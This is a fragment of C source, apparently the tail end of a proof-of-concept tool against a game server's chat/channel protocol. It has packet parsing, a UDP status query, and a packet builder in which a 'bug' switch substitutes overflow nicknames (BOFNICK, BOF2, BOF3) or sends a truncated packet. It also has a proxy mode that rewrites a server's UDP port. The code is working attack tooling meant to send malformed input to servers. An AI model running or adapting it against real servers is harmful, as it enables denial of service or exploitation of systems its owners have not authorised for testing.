                    printf("User with ID %hu is exited\n", ntohs(*(u_short *)ptr));
                    } break;
                case 0x0c0f: {
                    err = size - 2;
                    printf("User with ID %hu has name: ", ntohs(*(u_short *)ptr));
                    fwrite(ptr + 2, err, 1, stdout);
                    fputc('\n', stdout);
                    } break;
                case 0x0d0f:
                case 0x0e0f: {
        /* I don't know...
                    printf("%hu - %d\n",
                        ntohs(*(u_short *)ptr), ntohl(*(u_long *)(ptr + 2)));
        */
                    } break;
                case 0x0f0f: {
                    ip.s_addr = *(u_long *)(ptr + 2);
                    port      = *(u_short *)(ptr + 6);
                    printf("Source address of user with ID %hu is %s:%hu\n",
                        ntohs(*(u_short *)ptr),
                        inet_ntoa(ip),
                        ntohs(port));
                    if(!sock && !ip.s_addr) {
                        *(u_short *)(ptr + 6) = htons(PROXYPORT);
                        printf("Proxy message: Changed the server's UDP port to proxy port %d\n", PROXYPORT);
                    }
                    } break;
                default: {
                    printf("--> Undefined type: %04x (hex dump follows)\n", type);
                    if(size > 0) show_dump(ptr, size, stdout);
                    } break;
            }
            next = 0;
            ptr += size;
        } break;
    }

    } /* while */
}






void gs_info_udp(u_long ip, u_short port) {
    struct  sockaddr_in peer;
    int     sd,
            err,
            plen,
            nt = 1;
    u_char  buff[2048],
            *p1,
            *p2;


    peer.sin_addr.s_addr = ip;
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    plen                 = sizeof(peer);

    printf("\nRequesting informations to %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, plen)
      < 0) std_err();

    timeout(sd);
    err = recvfrom(sd, buff, sizeof(buff) - 1, 0, (struct sockaddr *)&peer, &plen);
    if(err < 0) std_err();

    buff[err] = 0x00;
    p1 = buff;
    while(1) {
        p2 = strchr(p1, '\\');
        if(!p2) break;
        *p2 = 0x00;

        if(!nt) {
            printf("%20s: ", p1);
            nt++;
        } else {
            printf("%s\n", p1);
            nt = 0;
        }
        p1 = p2 + 1;
    }
    printf("%s\n\n", p1);

    close(sd);
}





u_char *create_pck(char *channel, char *password, char *nick, u_short *pcklen) {
    static  u_char  buff[BUFFSZ + 1];
    u_char          *ptr = buff;
    u_short         len,
                    tmp,
                    pwlen = 0,
                    chlen,
                    nicklen;

    chlen = strlen(channel) + 1;
    if(password) pwlen = strlen(password) + 1;

    len = chlen + pwlen + 12;
    tmp = htons(len);

    PTR_MC("\x0f\x00", 2);
    PTR_MC(&tmp, 2);

        /* I dunno what the following 12 bytes mean, but they work fine */
    PTR_MC("\x6A\xD6\x4C\x03\x96\xED\x3B\xE7\x88\xE2\xA9\x74", 12);
    PTR_MC(channel, chlen);

    if(password) PTR_MC(password, pwlen);

    PTR_MC("\x0f\x10", 2);

    switch(bug) {
        case 1: nick = BOFNICK; break;
        case 2: {
            *pcklen = ptr - buff;
            return(buff);
            } break;
        case 3: nick = BOF2; break;
        case 4: nick = BOF3; break;
        default: break;
    }

    nicklen = strlen(nick);
    tmp = htons(nicklen);
    PTR_MC(&tmp, 2);
    PTR_MC(nick, nicklen);

    memcpy(ptr,
            "\x0F\x11"
            "\x00\x04" "\x00\x00\x00\x02"
            "\x0F\x12"
            "\x00\x04" "\x00\x00\x00\x00", 16);

    *pcklen = ptr - buff + 16;

    return(buff);
}





u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}





void timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) {
        fputs("\nError: Socket timeout, no answers received\n", stdout);
        exit(1);
    }
}





#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



